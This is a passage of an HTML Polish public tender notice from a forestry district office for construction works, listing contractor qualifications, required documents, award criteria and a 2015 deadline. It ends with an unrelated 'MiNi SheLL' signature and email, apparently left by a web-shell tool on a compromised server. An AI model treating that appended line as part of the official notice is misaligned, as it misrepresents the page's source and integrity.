a)	uprawnienia budowlane kierownika budowy w specjalności konstrukcyjno-budowlanej bez ograniczeń,
b)	uprawnienia budowlane kierownika robót sanitarnych w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń wodno-kanalizacyjnych bez ograniczeń, 
c)	uprawnienia budowlane kierownika robót elektrycznych w specjalności instalacyjnej w zakresie instalacji, sieci i urządzeń elektrycznych bez ograniczeń.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczeń, o których mowa
w pkt 7.1. i 7.3. SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony, jeżeli wykonawca wykaże, że:
a)	posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 1 000 000,00 zł. 
b) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1 000 000,00 zł.
Ocena spełnienia tego warunku zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie złożonych wraz z ofertą oświadczenia i dokumentów,
o których mowa w pkt 7.1., 7.4., 7.5 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy wg załącznika nr 1 do SIWZ, Oświadczenie o powierzeniu wykonania części zamówienia podwykonawcom wg załącznika nr 4 do SIWZ, kosztorys ofertowy, szczegółowy harmonogram rzeczowo-finansowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kalisz.poznan.lasy.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Kalisz z s. Szałe, ul. Kaliska nr 195, gm. Opatówek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2015 godzina 11:00, miejsce: Nadleśnictwo Kalisz z s. Szałe, ul. Kaliska nr 195, gm. Opatówek, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com